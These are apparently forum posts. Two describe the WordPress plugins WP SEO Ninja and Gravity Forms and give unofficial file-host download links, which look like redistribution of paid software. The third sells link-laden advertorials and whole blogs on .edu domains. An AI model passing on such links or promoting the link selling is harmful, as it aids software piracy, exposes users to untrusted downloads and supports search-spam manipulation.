  23. WP SEO Ninja is a WordPress plugin that helps you optimize your site correctly for search engines, i.e. SEO. Compared with other similar programs, such as All in One SEO, this plugin offers a very useful tool for optimizing not just the main interface or the technical side, but also helps optimize the posts themselves, which in turn will help the whole site. Installation is very simple, as with any other plugin. (Click on Plugins ->> Add New ->> Upload) LE: Is WP SEO Ninja compatible with foreign-language sites? As of now, WP SEO Ninja is not compatible with foreign-language sites. So if you have a foreign-language site, please do not get this. Download links: http://www.mediafire.com/?hel8ra60u1qbcdg http://www.multiupload.nl/SFCV01PFBG http://www.4shared.com/zip/vjnttEvq/wpseoninja.html http://depositfiles.com/files/fbh7kokma
  24. I sell advertorials with a maximum of 3 links included in the article on .edu blogs at a price of 5 dollars/advertorial. I also sell .edu blogs on the WordPress platform, web 2.0 included, administered only by you, at a price of $150.
  25. Gravity Forms is a complete contact form solution for WordPress. With Gravity Forms you can build complex, interactive contact forms in minutes with no programming experience. Add-ons: Campaign Monitor Freshbooks Paypal Twilio User Registration MailChimp Metarecovery Info: WordPress Forms - Gravity Forms Contact Form Builder and Lead Data Management Plugin For WordPress Add-Ons - Gravity Forms 1.5 Demo: Gravity Forms Demo usr: demo pwd: demo Download: http://dl.dropbox.com/u/28878468/Gravity_Forms_1.6.zip Gravity_Forms_1.6.zip | localhostr.com - share … anything